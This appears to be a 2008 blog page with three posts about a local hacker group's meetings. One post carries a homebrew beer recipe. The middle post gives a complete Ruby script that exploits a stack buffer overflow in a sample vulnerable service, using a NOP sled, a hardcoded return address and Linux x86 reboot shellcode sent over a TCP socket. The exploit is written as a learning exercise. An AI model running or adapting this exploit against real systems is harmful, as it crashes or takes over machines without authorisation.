July 23rd, 2008 Anthony Towry
This past Friday the Defcon 405 group held the July edition of the monthly meeting. This round featured 0hm as our headliner. He presented a riveting talk on "Hardening Windows Server: Building a House out of Greased BBs". I taped the presentation and as soon as I coordinate slides, will post the video.
I also handed out a few samples of the latest homebrew.
The Ingredients for DC405 Truth Serum:
- 7lbs DME
- 3lbs Coopers IPA LME
- 1lb Crystal Malt
- 1lb Liberty Malt
- 1oz Saaz
- 1oz Columbus
- White Labs Dry Ale Yeast
So far it's been a pretty tasty beverage. Not my typical hop bombs, but I guess I can get used to it. Look for it at Defcon! 0hm and I will be attempting to dish out some nasty at the 0wn the b0x/0wn the b0x contest, find us there.
Posted in Community | No Comments »
February 13th, 2008 Anthony Towry
This Friday we are getting back into the trenches at the DC405. We have a talk coming up on remote exploitation of stack-based overflows that will be presented by ri0t.
So, I've been checking out the write-up by Preddy regarding the service. It's a nice walk-through on exploiting an example vulnerable service using both C and Perl. This is informative, I had to adjust my payload size (no biggie) and do a #include <string.h>, but overall a solid example without errors.
Exploits written in C are fairly common. Exploits written in Perl aren't rare. Exploits written using Ruby are like unicorns...they probably exist, but you never see one (at least where I'm keeping up with them). At any rate, I decided to look into rewriting the example exploit into Ruby and scratching the surface concerning Ruby sockets. It turns out that this is an extremely simple thing to do.
#!/usr/bin/ruby
# http://www.calculateddecision.com
require 'socket'
port = 7500
victim=ARGV[0]
nop = "\x90"
sled=nop*240
#This will probably be different for you
eip = "\xa8\xf9\xff\xbf"
#20 byte reboot shellcode Linux x86 Thanks to izik <izik@tty64.org>
shellcode="\x6a\x58"+
"\x58"+
"\xbb\xad\xde\xe1\xfe"+
"\xb9\x69\x19\x12\x28"+
"\xba\x67\x45\x23\x01"+
"\xcd\x80"
payload=sled<<shellcode<<eip
if (ARGV.length<1)#Brief usage
puts "You have to give me a target"
else
mysocket=TCPSocket::new(victim,port)
mysocket.send(payload,0)
mysocket::close
end
As you can see, the TCPSocket constructor only requires an endpoint and a port. What's nice is that you can actually throw a domain name and it will resolve it. I half wondered if the hex bytes would need to be encoded or anything, but this is also handled for us without issue.
Looking at Preddy's perl example, these two forms don't really differ all that much and in fact, I'm not entirely sure that there isn't a simpler socket constructor available in perl (if nothing else CPAN). Even so, Ruby does IMHO offer a more inviting grammar.
You can download my send_overflow.rb here.
Notes:
xWinGs wrote a local ENV variable example
Posted in Programming, Security | 2 Comments »
November 24th, 2007 Anthony Towry
The DC 405 meeting for November covered the ins and outs of wireless security. n0mad presented some interesting things involving high-end countermeasures and solutions to common wireless deployment problems. Check it out online at blip.tv.
Posted in Community, Security | No Comments »
